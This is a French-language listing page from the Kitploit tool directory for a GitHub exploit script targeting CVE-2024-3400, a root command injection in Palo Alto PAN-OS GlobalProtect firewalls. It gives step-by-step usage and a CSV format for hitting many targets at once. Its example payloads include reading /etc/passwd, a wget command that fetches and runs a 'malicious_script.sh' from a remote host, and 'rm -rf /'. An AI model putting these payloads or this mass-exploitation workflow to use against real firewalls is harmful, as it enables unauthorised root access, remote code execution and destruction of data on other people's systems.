Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-3400 — # Script d'exploitation pour CVE-2024-3400 Script d'exploitation pour CVE-2024-3400, une injection de commande dans PAN-OS GlobalProtect, permettant l'exécution de code à distance non authentifiée avec les privilèges root. Prend en charge l'exploitation de cibles uniques et multiples basée sur des fichiers CSV. | Kitploit
Outils/GitHubGitHub/yuvvi01/cve-2024-3400
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

Voir le dépôt
1151il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

# Script d'exploitation pour CVE-2024-3400 Script d'exploitation pour CVE-2024-3400, une injection de commande dans PAN-OS GlobalProtect, permettant l'exécution de code à distance non authentifiée avec les privilèges root. Prend en charge l'exploitation de cibles uniques et multiples basée sur des fichiers CSV.

Partager

Script d'exploitation de pare-feu PAN-OS

Ce script est conçu pour démontrer l'exploitation de vulnérabilités dans les pare-feu PAN-OS. Il envoie une charge utile spécialement conçue au point de terminaison API du pare-feu pour exécuter des commandes arbitraires. Cet exploit cible spécifiquement CVE-2024-3400, une vulnérabilité d'injection de commandes dans la fonctionnalité GlobalProtect du logiciel PAN-OS de Palo Alto Networks pour certaines versions de PAN-OS. Certaines configurations de fonctionnalités peuvent permettre à un attaquant non authentifié d'exécuter du code arbitraire avec les privilèges root sur le pare-feu.

Remarque: Assurez-vous de n'utiliser ce script qu'à des fins légales et éthiques, et uniquement sur des machines pour lesquelles vous avez l'autorisation de tester.

Utilisation

Pour utiliser ce projet, suivez ces étapes :

  1. Clonez ce dépôt:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. Changez de répertoire pour accéder au dépôt:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. Installez les modules requis:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Exécutez le script Python.
    root@kitploit:~
    python3 exploit.py
    

Suivez les invites pour saisir l'adresse IP du pare-feu PAN-OS vulnérable et la charge utile à exécuter.

Exemples de charges utiles

  1. Lister le contenu d'un répertoire:
    root@kitploit:~
    ls -la
    
    
  2. Afficher le contenu d'un fichier spécifique:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. Afficher le nom d'utilisateur de l'utilisateur actuellement connecté au système:
    root@kitploit:~
    whoami
    
    
  4. Télécharger un fichier depuis Internet (nécessite que wget ou curl soit installé):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. Soyez très prudent avec celle-ci:
    root@kitploit:~
    rm -rf /
    

Instructions pour une utilisation sécurisée

Vérification du certificat SSL

Le script demandera le chemin du fichier du certificat SSL du serveur de pare-feu PAN-OS. Si aucun chemin n'est fourni, le script définira automatiquement la vérification SSL sur false, désactivant ainsi SSL.

Instructions pour le fichier CSV

Ce script vous permet d'exploiter plusieurs cibles de pare-feu PAN-OS vulnérables à l'aide d'un fichier CSV. Vous trouverez ci-dessous les instructions pour formater correctement le fichier CSV :

Format du fichier CSV:

Le fichier CSV doit comporter trois colonnes :

ipaddress: L'adresse IP du pare-feu PAN-OS vulnérable. payload: La charge utile à exécuter sur le pare-feu. path/to/root_CA_certificate.pem: Le chemin du certificat d'autorité de certification racine (laissez vide si la vérification du certificat est désactivée).

  • Exemple de fichier CSV:
    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

Instructions:

Créez un fichier CSV au format spécifié. Renseignez les adresses IP, les charges utiles et les chemins des certificats d'autorité de certification racine (le cas échéant). Assurez-vous de fournir des chemins valides vers les certificats d'autorité de certification racine, ou laissez le champ vide si la vérification du certificat est désactivée. Exécutez le script et choisissez l'option permettant d'utiliser le fichier CSV lorsque vous y êtes invité.

Références

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
Télécharger l’outil